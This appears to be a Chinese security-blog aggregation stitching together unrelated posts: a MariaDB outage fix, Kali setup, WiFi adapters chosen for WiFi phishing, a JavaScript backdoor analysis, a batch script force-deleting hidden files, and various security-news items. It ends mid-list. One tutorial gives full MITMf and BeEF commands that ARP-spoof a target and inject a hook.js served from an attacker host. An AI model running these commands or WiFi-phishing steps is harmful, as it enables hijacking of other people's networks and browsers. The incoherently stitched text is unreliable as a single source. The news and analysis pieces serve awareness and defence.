ISHACK AI BOT

中午还在午休，在以前公司上班的同时发来消息，说是数据库挂掉了。让我帮他看看。嗯……（虽然已离职，但是感情还是有的吗。）发来截图。的确是数据库挂掉了。 然后，开始了我一下午的填坑记。 恩嫩，mmp先看看能不能启动数据库。执行命令： service mysqld start恩 ，报错。 提示错误：/var/lib/mysql/mysql.cock 估计是mysql.sock文件丢失。然后已在遵循先百度后google的原则，找了半天还是无法解决问题。过程太艰苦。就不说了…… 查看数据库日志 恩恩 ，早上11:05分挂掉的。资讯了下十一点的时候有么有对数据库操作。说着是新增了虚拟主机来着，对数据库没有操作。这个就怪了…… 没事，我们接着找原因，既然是mysql.sock文件丢失，能不能从其他地方复制一份呢？ 结果还是失败 mmp。想着不行就直接从装数据库吧，但是他那边没有备份，这时只能用一首《凉凉》来形容当时的心境了。好吧！不放弃接着找原因。 对当前系统分析 系统：centos7数据库：mariadb引擎: apache 等等，centos7中。使用mariadb代替了mysql。这也许不是mysql的问题而是mariadb的问题。 OK，我们试着启动mariadb service mariadb startOK，伟大的mysql终于启动了

vim /etc/apt/sources.list按 i 键，删除里面的内容。粘贴下方的源 deb http://mirrors.ustc.edu.cn/kali kali-rolling main non-free contrib 注意：前面有#号的不要管，那是被注释掉的。 保存后 执行命令 apt-get uodate && apt-get upgrade 原文链接：传送门

网卡一芯片为3070 优点：最要用来进行WiFi钓鱼。使用此网卡相比其他的网卡而言，钓鱼页面跳转是最快的。 网卡二芯片为:8187 优点：发送功率比较高，用传统的破解WiFi的方式（如抓包）等比较好用。 缺点：进行WiFi钓鱼时，钓鱼页面的跳转极其缓慢。 网卡三芯片：8812au 优点：支持5G/HZ 支持WiFi钓鱼 缺点：安装驱动比较困难 官方驱动安装教程 apt-get update apt install realtek-rtl88xxau-dkms

在一台被入侵的服务器上，我们发现了一个攻击者遗留下来的脚本。该脚本是由JavaScript编写的，主要功能是作为Windows后门及C&C后端使用。在这里我首先要向大家说声抱歉，为了保护客户的隐私，在本文中我不会对一些细节做太多的探讨和描述。 该脚本的体积非常的小只有不到2KB，唯一能表明它的存在的是一个名为“wscript.exe”的运行进程，这是一个合法的Windows程序。脚本的主要部分包含一个无限循环的命令等待，在将查询字符串“reflow”传递给C&C 之后，它会休眠4个小时。 C&C的回调如下所示： 为了获取更多的信息，我开始在各种搜索引擎和VirusTotal中搜索相关的代码段，但令我失望的是我什么也没发现。因此，我决定使用Recorded Future来帮助我寻找。Recorded Future可以通过扫描并分析成千上万网站、博客、twitter帐户的信息来找到目前和未来人们、组织、活动和事件之间的关联性。 在返回结果中匹配了三个在2017年12月删除的匹配项。缓存的数据和链接回的源帮助我用C&C包恢复了压缩文件。 在软件包中有四个主要脚本（3个PHP和1个JavaScript文件）被复制到Web服务器。web服务器可能受到攻击者控制或受到其它手段的危害。其中的主要脚本index.php包含了一个SVG动画，当访问者碰巧访问该页面后，会看到如下画面。 该脚本显示，当“reflow”传递到页面时，恶意JavaScript文件（被重命名为一个PNG文件）的内容将被发送到受害者PC，并通过后门脚本进行评估。恶意脚本会通过WMI来获取系统信息，然后将该信息作为其身份验证方法的一部分发回。 在这里我们可以看到，该恶意脚本被无限循环运行，等待上传，下载和执行等命令。 “mAuth”函数会生成短随机字符串，并将它们与系统信息连接起来，并在Base64编码后的Cookie中将其传递给C&C。这些随机字符串很重要，因为它们被用作标记来识别包含在它们之间的指令。 数据通过AJAX回传给C&C。这里有一个名为“FillHeader”的函数用来填充HTTP头。 以下是当受害者PC检查时HTTP请求的样子： 对cookie值执行Base64解码结果在第二行。在第二个符号显示系统信息后，重复字符串上的Base64解码。 其中的一个PHP脚本似乎是一个模板，被使用HTML代码修改以使页面看起来合法（例如，它包含实际网页的一部分）。该脚本被重命名并由index.php脚本引用。该脚本具有负责上传和下载文件以及创建活动日志的所有功能。日志文件包括受害者的IP地址，上传和下载的文件，会话信息等。 “Authentication”函数读取来自受害者的cookie值并解析出系统信息，以及定义用于创建日志文件名的变量。受害者的用户名和计算机名称为MD5哈希，并被作为日志文件名称的一部分使用。当受害者PC连接到C&C时，会在C&C服务器上创建三个文件： 包中的最后一个PHP脚本用于与受害PC进行交互，并将命令发送给受害PC。请注意timezone和有趣的login方法。 可用的命令非常有限，但这已经足以让攻击者将更多更强大的工具上传到受害者的PC上，并获取更进一步的网络访问权限。最后，如果攻击者意识到他们即将被发现，他们可以使用此脚本中内置的另一组命令，来删除所有重要的日志文件。 署名：逸之枫|Pilferer

很多人说病毒清除掉后留下很多尸体文件，虽然可以删除，但是他们无处不在，一个个干掉实在是太麻烦了。 比如viking留下的_desktop.ini；比如欢乐时光留下的desktop.ini、folder.htt；还比如病毒经常在你的硬盘跟目录下放上属性为系统+隐藏的autorun.inf，以及这个文件里run=字段后面的程序，数不胜数…… 那么如何来干掉这些垃圾？实际上你可以利用搜索功能从“我的电脑”范围内将这些垃圾搜索出来，然后CTRL+A全选，DEL删除！当然要记得搜索时在“更多高级选项”里把“搜索隐藏的文件和文件夹”和“搜索系统文件夹”两这个地方勾上，否则毛也搜不到！ 以上是一个方法，但是下面这个方法会让你更爽，因为你不但要干掉这些该死的病毒，还能从中学会一些东西，能感受的到那些该死的文件被喀嚓的快感……那么还等什么，我们开始吧！ 你将会看到一个批处理程序，基本上由DEL和FOR两个命令组成。基本框架和原理是很简单的：用FOR来循环所有的驱动器和目录，用DEL来删除目标文件。先看一下代码： FOR %%I IN (c:,d:,e:) DO CD /D %%I & FOR %% J IN (filename1, filename2, filename3) DO DEL %%J /A HS /F /S ECHO 目标文件删除完毕，按任意键退出 PAUSE 代码说明： 所有大写部分都是程序中不可修改的代码，红色和蓝色部分是可以修改的。 红色部分请修改成你当前的盘符，有多少个就写进去多少个，格式照猫画虎即可(注意，盘符后面要跟英文冒号，每个盘之间要用英文逗号隔开)。蓝色部分请修改成要删除的目标文件，必须带扩展名(如autorun.inf)，而且用英文逗号隔开，如果只有一个文件就不用写逗号了。请注意：因为执行的程序是删除，请务必确保你写的目标文件就是你要删除的病毒尸体，如果你写成别的文件而被删了，可别来找偶！ 将代码保存为一个扩展名为bat或者cmd的批处理文件，然后双击执行，你就会看到那些该死的病毒尸体在屏幕上一闪而过，再也找不到踪影了！ 给个具体的例子，比如你的硬盘有C、D、E、F四个盘，你中了viking(威金)，病毒清除完后在每个文件夹下都留下一个_desktop.ini文件(什么，你没看到？因为人家是隐藏的)，这个玩意怎么用我们的程序来删除？代码如下： FOR %%I IN (c:,d:,e:,f DO CD /D %%I & FOR %%J IN (_desktop.ini) DO DEL %%J /A HS /F /S ECHO 目标文件删除完毕，按任意键退出 PAUSE 如果你的硬盘里没有这些尸体文件，但又想测试一下效果，可以自己建一些目录，在里面随意放上些文件，把红色部分修改为你建的目录，把蓝色部分修改为你放的文件，保存、运行即可，你会发现那些文件都消失了。所以如果你想批量删除某些文件的时候就可以用到这个脚本。其他演化方式，大家八仙过海去吧！ 还是那句话，对付病毒，锻炼手工能力才是真的，杀毒软件都是很弱智的，要不为什么不把病毒尸体给你处理干净呢？我们自己动手，丰衣足食！ 署名：逸之枫|Pilferer

Mitmf 是一款用来进行中间人攻击的工具。它可以结合 beef 一起来使用，并利用 beef 强大的 hook 脚本来控制目标客户端。下面让我们一起看看如何在 Kali2.0上安装使用 Mitmf 。默认在2.0上并未安装，在之前的版本有安装。 首先，我们先进行工具依赖包的安装。打开 terminal 终端，输入如下命令: apt-get install python-dev python-setuptools libpcap0.8-dev libnetfilter-queue-dev libssl-dev libjpeg-dev libxml2-dev libxslt1-dev libcapstone3 libcapstone-dev libffi-dev file 以上结果出现一些安装包无法安装的情况，这里我们无需理会，继续我们的下一步操作即可。 依赖包安装完成后，就可以开始安装Mitmf 了、输入命令: apt-get install mitmf 不过这样安装完成后 mitmf 依然无法正常使用它的一些功能。因为缺少了 twisted 的版本兼容性。我们来安装适合 mitmf 的 twisted 。如果你已经安装过，那么先卸载之前的版本。输入命令: pip uninstall twisted shell 并用 wget 命令进行下载。wget http://twistedmatrix.com/Releases/Twisted/15.5/Twisted-15.5.0.tar.bz2 安装 twisted 。pip install ./Twisted-15.5.0.tar.bz2 ··· 这样，我们就可以正常使用 mitmf 了。 下面让我们运行 beef 来调用 beef 强大的 hook 脚本。首先我们进入beef目录并启动它。 cd /usr/share/beef-xss ./beef 我们在浏览器打开UI界面后，下面我们就用 mitmf 进行中间人攻击。输入如下命令: mitmf –spoof –arp -i eth0 –gateway 192.168.1.1 –target 192.168.1.100 –inject –s-url http://192.168.15.131:3000/hook.js 更多功能 mitmf -h

Common Crawl 非营利组织维护着一个庞大的开源存储库，其中存储了自 2008 年以来收集的数 PB 级网络数据，任何人都能免费使用这些数据。由于数据集规模巨大，许多人工智能项目，包括 OpenAI、DeepSeek、Google、Meta、Anthropic 和 Stability 等公司的大型语言模型（LLM）训练，可能至少部分依赖这一数字档案。 Truffle Security 公司（TruffleHog 敏感数据开源扫描器背后的公司）的研究人员对 Common Crawl 2024 年 12 月档案中 267 亿个网页的 400 TB 数据进行检查后，发现了 11,908 个成功验证的有效机密。这些机密均为开发人员硬编码，这意味着 LLM 存在在不安全代码上进行训练的可能性。 在这些机密中，有 Amazon Web Services（AWS）的根密钥、MailChimp API 密钥以及 WalkScore 服务的有效 API 密钥等。 前端 HTML 源代码中的 AWS 根密钥：Truffle Security TruffleHog 在 Common Crawl 数据集中总共识别出 219 种不同类型的秘密，其中最常见的是 MailChimp API 密钥，近 1,500 个独特的 Mailchimp API 密钥被硬编码在前端 HTML 和 JavaScript 中。 MailChimp API 密钥在前端 HTML 源 代码中泄露：Truffle Security 开发人员的失误在于将这些密钥硬编码到 HTML 表单和 JavaScript 片段中，而未使用服务器端环境变量，这使得攻击者有可能利用这些密钥开展恶意活动，如进行网络钓鱼、品牌冒充，进而导致数据泄露。 此外，研究人员还发现报告中的机密存在高重复使用率，63% 的机密出现在多个页面上。例如，一个 WalkScore API 密钥在 1,871 个子域中出现了 57,029 次。研究人员还在一个网页上发现了 17 个独特的实时 Slack webhook，而 Slack 明确警告 webhook URL 包含秘密，严禁在网上（包括通过公共版本控制存储库）分享。 尽管 LLM 训练数据会经过预处理阶段，旨在清理和过滤掉不相关数据、重复内容、有害或敏感信息，但机密数据仍然难以彻底删除，且无法保证完全清除如此庞大数据集中的所有个人身份信息（PII）、财务数据、医疗记录和其他敏感内容。 研究结束后，Truffle Security 联系了受影响的供应商，并协助他们撤销了用户的密钥，成功帮助这些组织集体轮换 / 撤销了数千个密钥。即便人工智能模型使用的是比研究人员扫描的数据集更旧的档案，Truffle Security 的发现仍给我们敲响了警钟，不安全的编码实践可能会对 LLM 的行为产生影响。

近期，Splunk 威胁研究团队发现了一起大规模恶意软件攻击活动，4000 多家互联网服务提供商（ISP）深受其害，黑客借此获得了关键基础设施的远程访问权限。种种迹象表明，此次攻击或源自东欧，攻击者运用了暴力攻击手段、植入加密挖掘负载，并采用了先进的规避技术。 攻击概述 该恶意软件专门针对 ISP 系统中存在的弱凭证，通过暴力破解的方式强行渗透进入。一旦成功潜入系统，攻击者便迅速部署一系列恶意二进制文件，像 mig.rdp.exe、x64.exe 和 migrate.exe 等。这些文件一方面执行加密挖掘操作，利用受害系统的计算资源谋取利益；另一方面，负责窃取敏感信息。 这些恶意有效载荷具备多种破坏能力，它们能够禁用系统的安全功能，通过命令和控制（C2）服务器（其中包括 Telegram 机器人）将窃取的数据泄露出去，并且能够在受感染的网络中寻找并攻击其他目标。在受感染网络中横向移动时，该恶意软件主要借助 Windows 远程管理（WINRM）服务。它运用编码的 PowerShell 脚本，不仅可以禁用防病毒保护，终止其他竞争的加密矿工程序，还能在受感染的系统上建立起长期的控制权，同时修改目录权限，限制用户访问，防止自身文件被发现。 启用目录的继承权限 技术细节 此次恶意软件活动采用自解压 RAR 档案（SFX）的方式，极大地简化了部署过程。以 mig.rdp.exe 有效载荷为例，它会释放出多个文件，其中包含批处理脚本（ru.bat、st.bat）和可执行文件（migrate.exe）。这些文件会禁用 Windows Defender 的实时监控功能，并添加恶意例外，以此躲避安全软件的检测。另一个组件 MicrosoftPrt.exe 则充当剪贴板劫持程序，专门针对比特币（BTC）、以太坊（ETH）、莱特币（LTC）等加密货币的钱包地址进行窃取。 攻击者还使用 masscan.exe 这类大规模扫描工具，识别 ISP 基础设施内易受攻击的 IP 范围。一旦确定目标，便利用 SSH 或 WINRM 协议进一步获取访问权限。 SSH 连接凭证 为了提高攻击效率，攻击者利用 Python 编译的可执行文件实现自动化操作，这样既能最大限度减少操作痕迹，又能在受限环境中保持高效运作。像 Superfetch.exe（XMRig 加密矿工）、IntelConfigService.exe（用于逃避防御的 AutoIt 脚本）以及 MicrosoftPrt.exe 等文件，均已被研究人员标记。这些文件通常隐藏在诸如 C:\Windows\Tasks\ 或 C:\ProgramData\ 等非常规目录中。此外，该恶意软件还会操纵注册表项，禁用远程桌面协议（RDP）服务，注销活跃用户，以此阻碍受害方的补救工作。 此次活动凸显了针对关键基础设施提供商的恶意软件日益复杂化。 通过将加密挖掘与凭证盗窃和高级持久性机制相结合，攻击者的目标是最大限度地利用资源，同时逃避检测。 使用 Telegram 机器人作为 C2 服务器进一步使传统的网络监控工作复杂化。 Splunk发布了一套检测规则，帮助组织识别与此活动相关的可疑活动。 这些包括针对不寻常文件路径、基于 WINRM 的 PowerShell 执行以及与 Telegram API 相关的 DNS 查询的警报。 由于互联网服务提供商 (ISP) 仍然是数字连接的重要支柱，此次攻击凸显了采取强有力的网络安全措施的迫切需求。 建议组织实施强密码策略，密切监控端点活动，并部署先进的威胁检测工具，以减轻与此类复杂活动相关的风险。

格拉茨技术大学的研究人员发现了一种具有突破性的基于软件的旁道攻击方式 ——KernelSnitch，它利用的是 Linux 内核数据结构中的时间差异。 根据研究人员在 Github 上发布的报告，与依赖硬件的攻击不同，KernelSnitch 主要针对哈希表、基数树和红黑树。这使得非特权攻击者能够跨越隔离进程泄露敏感数据。 漏洞：内核数据结构是静默泄漏者 操作系统依靠哈希表和树等动态数据结构来管理用户空间锁、计时器和进程间通信 (IPC) 的元数据。 KernelSnitch 利用了一个关键的架构疏忽：访问这些结构所需的时间取决于它们的占用情况（元素的数量）。 通过测量系统调用执行时间，攻击者可以推断占用率并提取秘密。 KernelSnitch 的工作原理 1、时间测量：攻击者触发与内核结构交互的系统调用（例如，futex、msgget）。 2、占用率推断：系统调用持续时间越长，表示由于迭代搜索（例如，遍历哈希桶中的链接列表）导致的占用率越高。 3、放大：哪怕是极其微小的时间差异（低至 8 个 CPU 周期），也会通过缓存抖动（刷新 CPU 缓存以加剧内存延迟）或者结构操作（人为增加占用率）被放大。 KernelSnitch 利用哈希表中的可变访问时间。每个存储桶的链接列表长度会影响系统调用持续时间，通过时间戳比较泄露。 分析 1、隐蔽通道（580 kbit/s 传输）：恶意进程通过调节哈希桶占用率来进行通信。在 Intel i7 - 1260P 上，KernelSnitch 利用 futex 子系统实现了 580 kbit/s 的传输速度，错误率为 2.8%。 2、内核堆指针泄漏：攻击者通过强制哈希碰撞，可以推断出哈希函数中使用的秘密内核地址（例如 mm_struct）。这能够实现精确的堆操作以提升特权，并且在 65 秒内就能泄露指针。 3、网站指纹识别（准确率 89%）：在网页加载期间，监控 Firefox 的 futex 活动可以创建独特的时间指纹。卷积神经网络（CNN）能够从 Ahrefs Top 100 列表中识别出网站，F1 得分为 89.5%。 为什么 KernelSnitch 很重要 · 与硬件无关：和 Spectre 或 Meltdown 不同，KernelSnitch 利用的是软件设计缺陷，能够绕过硬件缓解措施。 · 广泛影响：所有使用动态内核结构的主流操作系统都存在这个漏洞。该漏洞已在 Linux 5.15 - 6.8 版本上进行了测试。 · 隐身性：它不需要特权或共享内存，能够逃避现有的沙箱。 缓解与挑战 修复 KernelSnitch 需要进行根本性的变革： · 恒定时间结构：消除与占用情况相关的操作（例如预先计算最坏情况下的遍历步骤）。 · 命名空间隔离：限制跨安全域的结构共享。 · 随机散列：在散列函数中混淆内核地址输入。 正如合著者 Lukas Maar 所说：“对于通用内核来说，恒定时间编码并不现实。我们需要的是架构转变，而不是简单打补丁。” KernelSnitch 暴露了操作系统安全中一个普遍存在的盲点：性能优化在无意中创建了旁道。由于概念验证（PoC）代码已经公开，开发人员必须优先考虑强化结构，而不是进行增量修复。随着内核级攻击变得越来越复杂，重新思考核心设计范式已经刻不容缓，否则攻击威胁将会超过缓解措施的作用。

卡巴斯基发布的关于 2024 年移动恶意软件演变的最新报告显示，针对移动设备的网络威胁显著增加。 这一年，该安全公司的产品成功阻止了多达 3330 万次涉及恶意软件、广告软件或有害移动软件的攻击。 移动恶意软件格局正随着新的传播方案发生变化 广告软件依旧在移动威胁领域占据主导地位，在总检测数量中占比 35%。卡巴斯基安全网络发现了 110 万个恶意以及潜在有害的安装包，其中近 69,000 个与手机银行木马相关。 这份报告着重指出了移动恶意软件几个新出现且令人担忧的趋势。比如，发现了 Mamont 银行木马针对俄罗斯安卓用户的一种新型传播方案。攻击者运用社会工程手段，以折扣产品吸引受害者，随后发送伪装成货运追踪应用程序的恶意软件。 研究人员还在捷克共和国发现了一种新的 NFC 银行诈骗手段。网络犯罪分子利用钓鱼网站，传播合法 NFCGate 应用程序的恶意修改版本。从诈骗者的聊天记录中，能看到相关的钓鱼链接。这种诈骗手段通过 NFC 连接，诱骗用户泄露银行卡详细信息，让欺诈者得以进行未经授权的交易。 新兴威胁和复杂的攻击媒介 有一个重大发现是 SparkCat SDK 植入程序，它从 2024 年 3 月开始传播。该恶意软件存在于多个 Google Play 应用里，目的是窃取设备图库中的图像，尤其针对加密货币钱包的恢复短语。值得注意的是，这个植入程序的变种还成功渗透进了苹果的 App Store，成为已知首个绕过苹果严格安全措施的 OCR 恶意软件。 在移动威胁态势下，预装恶意应用程序的情况有所增多，比如在安卓电视机顶盒上检测到了 LinkDoor 后门（也叫 Vo1d）。这个恶意软件嵌入在系统应用程序中，能够执行任意代码，还能安装其他恶意软件包。 尽管恶意软件和不需要的软件安装包总体数量连续多年呈下降趋势，但下降速度已经变缓。尤其让人担忧的是，虽然唯一安装包数量有所减少，手机银行木马活动却持续呈上升态势。 随着移动设备越来越成为网络犯罪分子的主要攻击目标，对强有力的安全措施以及提升用户安全意识的需求，从未像现在这样迫切。移动恶意软件的复杂程度日益提高，这凸显了保持警惕、采用全面移动安全解决方案来防范这些不断加剧的威胁的重要性。

CISA 和 FBI 表示，部署“幽灵”勒索软件的攻击者已入侵了来自 70 多个国家多个行业领域的受害者，其中包括关键基础设施组织。 受影响的其他行业包括医疗保健、政府、教育、科技、制造业以及众多中小型企业。 CISA、FBI 以及 MS-ISAC 联合发布的一份咨询报告称：“自 2021 年初开始，幽灵黑客开始攻击那些互联网服务所运行的软件和固件版本过时的受害者。”目前，这种对存在漏洞的网络不加区分的攻击已导致全球 70 多个国家的组织受到侵害。 幽灵勒索软件的运营者经常更换其恶意软件可执行文件，更改加密文件的扩展名，修改勒索信的内容，并使用多个电子邮件地址进行勒索沟通，导致该组织的归属很难被及时确定。 与该组织有关联的名称包括 Ghost、Cring、Crypt3r、 Phantom、 Strike、 Hello、 Wickrme、HsHarada、和 Rapture。其攻击中使用的勒索软件样本包括“Cring.exe”“Ghost.exe”“ ElysiumO.exe” 和“Locker.exe”。 这个以盈利为目的的勒索软件团伙利用公开可获取的代码来攻击存在安全漏洞的服务器。他们针对的是 Fortinet（CVE-2018-13379）、ColdFusion（CVE-2010-2861、CVE-2009-3960）和 Exchange（CVE-2021-34473、CVE-2021-34523、CVE-2021-31207）中未修补的漏洞。 为防范幽灵勒索软件攻击，建议网络防御人员采取以下措施： 1.定期和异地备份不能被勒索软件加密的系统； 2.尽快修补操作系统、软件和固件漏洞； 3.重点关注幽灵勒索软件针对的安全漏洞（即CVE-2018-13379、CVE-2010-2861、CVE-2009-3960、CVE-2021-34473、CVE-2021-34523、CVE-2021-31207）； 4.分割网络以限制受感染设备的横向移动； 5.对所有特权帐户和电子邮件服务帐户实施防网络钓鱼的多因素身份验证（MFA）。 Amigo_A和Swisscom的CSIRT团队在2021年初首次发现Ghost勒索软件后，他们的运营商就开始投放定制的Mimikatz样本，然后是CobaltStrike信标，并使用合法的Windows CertUtil证书管理器部署勒索软件有效载荷，以绕过安全软件。 除了在Ghost勒索软件攻击中被用于初始访问之外，国家支持的黑客组织还扫描了易受攻击的Fortinet SSL VPN设备，并针对CVE-2018-13379漏洞进行了攻击。 攻击者还滥用了同样的安全漏洞，破坏了可以通过互联网访问的美国选举支持系统。 Fortinet在2019年8月、2020年7月、2020年11月和2021年4月多次警告客户，要针对CVE-2018-13379给SSL VPN设备打补丁。 CISA、FBI和MS-ISAC本周发布的联合咨询报告还包括妥协指标（ioc）、战术、技术和程序（TTPs），以及与FBI调查期间发现的幽灵勒索软件活动相关的检测方法（最近在2025年1月）。

一场名为“StaryDobry”的大规模恶意软件活动以破解游戏《Garry’s Mod， BeamNG》的木马版本为目标，攻击全球玩家。 这些游戏都是Steam上拥有数十万“绝对正面”评价的顶级游戏，因此它们很容易成为恶意活动的目标。 值得注意的是，据报道，在2024年6月，一个带花边的光束模型被用作迪士尼黑客攻击的初始访问向量。 根据卡巴斯基的说法，StaryDobry活动始于2024年12月下旬，结束于2025年1月27日。它主要影响来自德国、俄罗斯、巴西、白俄罗斯和哈萨克斯坦的用户。 攻击者在2024年9月提前几个月将受感染的游戏安装程序上传到torrent网站，并在假期期间触发游戏中的有效载荷，从而降低了检测的可能性。 StaryDobry活动时间表 StaryDobry感染链 StaryDobry活动使用了一个多阶段感染链，最终以XMRig加密程序感染告终。用户从种子网站下载了木马化的游戏安装程序，这些程序看起来都很正常。 活动中使用的恶意种子之一 在游戏安装过程中，恶意软件卸载程序（unrar.dll）被解包并在后台启动，在继续之前，它会检查它是否在虚拟机，沙箱或调试器上运行。 恶意软件表现出高度规避行为，如果它检测到任何安全工具，立即终止，可能是为了避免损害声誉。 Anti-debug检查 接下来，恶意软件使用‘regsvr32.exe’进行持久化注册，并收集详细的系统信息，包括操作系统版本、国家、CPU、 RAM和GPU详细信息，并将其发送到pinokino[.]fun的命令和控制（C2）服务器。 最终，dropper解密并将恶意软件加载程序（MTX64.exe）安装在系统目录中。 加载程序冒充Windows系统文件，进行资源欺骗，使其看起来是合法的，并创建一个计划任务，在重新启动之间持久化。如果主机至少有8个CPU内核，它将下载并运行XMRig挖掘器。 StaryDobry中使用的XMRig挖掘器是Monero挖掘器的修改版本，它在执行之前在内部构造其配置，并且不访问参数。 矿工始终维护一个单独的线程，监视在受感染的机器上运行的安全工具，如果检测到任何进程监视工具，它将关闭自己。 这些攻击中使用的XMRig连接到私有挖矿服务器，而不是公共矿池，这使得收益更难追踪。 卡巴斯基无法将这些攻击归因于任何已知的威胁组织。StaryDobry往往是一个一次性的活动。为了植入矿工，攻击者通常会实施一个复杂的执行链，利用寻求免费游戏的用户。这种方法可以帮助威胁者能够维持采矿活动的强大游戏机，最大限度地利用了矿工植入物。

zklend 官方承认遭到黑客攻击，威胁者利用智能合约中 mint() 函数的舍入错误漏洞盗取了 3600 个以太币，价值约 950 万美元。 zkLend 是一个建立在 Starknet 上的去中心化货币市场协议，Starknet 是以太坊的二层扩容解决方案，它使用户能够存入、借入和贷出各种资产。据了解，攻击者将“lending_accumulator”操纵为非常大的数值 4.069297906051644020，然后利用 ztoken mint() 和 withdraw() 过程中的舍入误差，反复存入 4.069297906051644021 wstETH，每次获得 2 个 wei，再取出 4.069297906051644020×1.5 - 1 = 6.103946859077466029 wstETH，每次仅花费 1 个 wei。 开发 Starknet 网络的 Starkware 确认，该漏洞并非 Starknet 技术本身的问题，而是某个应用程序特有的错误。 据 Cyvers 称，威胁者试图通过 RailGun 隐私协议清洗加密货币，但因协议政策而被阻止。 zkLend现已向黑客发出消息，称如果他们归还被盗以太坊的90%资金到以太坊地址：0xCf31e1b97790afD681723fA1398c5eAd9f69B98C，即3300 ETH后，他们可以保留另外10%的资金作为白帽赏金，并且不会对攻击承担任何责任。 目前zkLend 正在与安全公司和执法部门合作。如果在2025年2月14日前没有收到威胁分子的消息，该公司将继续采取下一步措施进行跟踪和起诉。目前，黑客还没有任何回应，这属网络攻击中的常见情况。

一款名为 SpyLend 的 Android 恶意软件应用程序已在 Google Play 上被下载超过 10 万次。该应用伪装成一款金融工具，但实际上是一个针对印度用户的掠夺性贷款应用程序。 该应用程序属于名为 SpyLoan 的恶意 Android 应用程序组，这些应用伪装成合法的金融工具或贷款服务，实际上却窃取设备数据用于掠夺性贷款。这些应用通常承诺提供快速简便的贷款，只需很少的文档，并提供诱人的条款，以此吸引用户。然而，在安装时，它们会请求过多的权限，从而窃取用户的个人数据，包括联系人、通话记录、短信、照片和设备位置等信息。 这些收集到的数据随后被用来骚扰、敲诈和勒索用户，尤其是当用户未能满足应用程序的还款条款时。 贷款诈骗和敲诈勒索 网络安全公司 CYFIRMA 发现了一款名为 Finance Simplified 的 Android 应用，该应用自称是一款财务管理工具，在 Google Play 上的下载量已达 10 万次。然而，CYFIRMA 表示，该应用在某些国家（如印度）表现出更多的恶意行为，会窃取用户设备的数据用于掠夺性贷款。研究人员还发现了其他恶意 APK，这些 APK 似乎是同一恶意软件活动的变种，包括 KreditApple、PokketMe 和 StashFur。 尽管该应用现已被从 Google Play 中移除，但它可能仍在后台运行，继续从受感染的设备中收集敏感信息。 Google Play 上 Finance Simplified 的多条用户评论显示，该应用提供的贷款服务会向未支付高额利息的借款人进行勒索。一位用户评论称：“这款应用程序非常糟糕，他们提供的贷款金额很低，然后勒索要求高额还款，否则就会把照片编辑成裸照进行威胁。” 这些应用程序还声称自己是注册的非银行金融公司（NBFC），但 CYFIRMA 表示这并不属实。 为了逃避 Google Play 的检测，Finance Simplified 加载了一个 WebView，将用户重定向到外部网站，然后从该网站下载托管在 Amazon EC2 服务器上的贷款应用 APK。 CYFIRMA 解释道：“Finance Simplified 应用程序似乎专门针对印度用户，它通过显示和推荐贷款申请、加载显示贷款服务的 WebView 来重定向到外部网站，然后在该网站下载单独的贷款 APK 文件。” 研究人员发现，只有当用户位于印度时，该应用程序才会加载欺骗性界面，这表明该活动具有特定的目标。 应用程序窃取敏感数据 该恶意软件活动更令人担忧的方面是其数据收集行为，其中包括存储在用户设备上的敏感个人信息。以下是该恶意软件窃取的数据摘要： · 联系人、通话记录、短信和设备详细信息。 · 来自内部和外部存储的照片、视频和文档。 · 实时位置跟踪（每 3 秒更新一次）、历史位置数据和 IP 地址。 · 最后 20 个复制到剪贴板的文本条目。 · 贷款历史和银行短信交易信息。 虽然这些数据主要用于敲诈那些错误申请贷款的受害者，但也可能被用于金融欺诈或转售给网络犯罪分子以牟利。 应对措施 如果您怀疑您的设备被任何上述应用程序或类似应用程序感染，请立即删除它们，重置权限，更改银行账户密码，并执行设备扫描。

GitVenom 活动是一种复杂的网络威胁，利用 GitHub 存储库传播恶意软件并窃取加密货币。该活动通过创建数百个看似合法但包含恶意代码的虚假 GitHub 存储库来实施攻击，旨在诱骗开发人员下载和执行恶意代码，从而导致严重的财务损失。 恶意代码部署 GitVenom 背后的攻击者使用多种编程语言（如 Python、JavaScript、C、C++ 和 C#）制作虚假项目。这些项目通常声称提供社交媒体或加密货币管理的自动化工具等功能，但实际上隐藏了恶意代码，执行恶意操作。 恶意存储库的示例结构 Python 项目：攻击者使用一种技术，在一长行制表符后隐藏解密并执行恶意 Python 脚本的代码。 JavaScript 项目：嵌入了恶意函数，用于解码并执行 Base64 编码的脚本。 C、C++ 和 C# 项目：恶意批处理脚本被隐藏在 Visual Studio 项目文件中，以便在构建过程中执行。 这些虚假项目部署的恶意负载会从攻击者控制的 GitHub 存储库下载其他恶意组件。这些组件包括一个 Node.js 窃取程序，用于收集凭证和加密货币钱包数据等敏感信息，并通过 Telegram 将其上传给攻击者。此外，攻击者还使用了开源工具如 AsyncRAT 和 Quasar 后门。 根据 SecureList 的报告，攻击者还使用了剪贴板劫持程序，将加密货币钱包地址替换为攻击者控制的地址，从而导致严重的财务盗窃。值得注意的是，一个攻击者控制的比特币钱包在 2024 年 11 月收到了约 5 BTC（当时价值约 485,000 美元）。 影响与缓解 GitVenom 活动已经活跃多年，全球范围内都有感染尝试的报告，尤其是在俄罗斯、巴西和土耳其。这一活动凸显了盲目运行 GitHub 或其他开源平台代码所带来的风险。 为了降低风险，开发人员在执行或集成第三方代码之前必须彻底检查代码。这包括检查可疑的代码模式，并确保代码功能与描述一致。随着开源代码的广泛使用，类似攻击活动的可能性也在增加，这进一步强调了在处理第三方代码时保持警惕的必要性。

依据《网络安全法》《个人信息保护法》《App违法违规收集使用个人信息行为认定方法》等法律法规及相关国家标准要求，近期国家计算机病毒应急处理中心通过互联网监测，发现14款移动应用存在隐私不合规行为。 一、个人信息处理者在处理个人信息前，未以显著方式、清晰易懂的语言真实、准确、完整地向个人告知个人信息处理者的名称或者姓名、联系方式、个人信息的保存期限等。涉及6款移动应用如下： 1、《艾乐游》（版本1.3.3，百度手机助手） 2、《江子为民》（版本1.1.54，应用宝） 3、《元气桌面壁纸》（版本3.52.4324，vivo应用商店） 4、《易念》（版本3.0.2，应用宝） 5、《同城酒库》（版本3.2.9，vivo应用商店） 6、《乐山商业银行》（版本3.31.6，应用宝） 二、隐私政策未逐一列出App（包括委托的第三方或嵌入的第三方代码、插件）收集使用个人信息的目的、方式、范围等。涉及10款移动应用如下： 1、《运多星司机》（版本1.2.6，应用宝） 2、《艾乐游》（版本1.3.3，百度手机助手） 3、《鲸鱼爱学》（版本3.1.0，应用宝） 4、《华龙智信恒生版》（版本7.1.3.0，应用宝） 5、《江子为民》（版本1.1.54，应用宝） 6、《元气桌面壁纸》（版本3.52.4324，vivo应用商店 7、《易念》（版本3.0.2，应用宝） 8、《乐山商业银行》（版本3.31.6，应用宝） 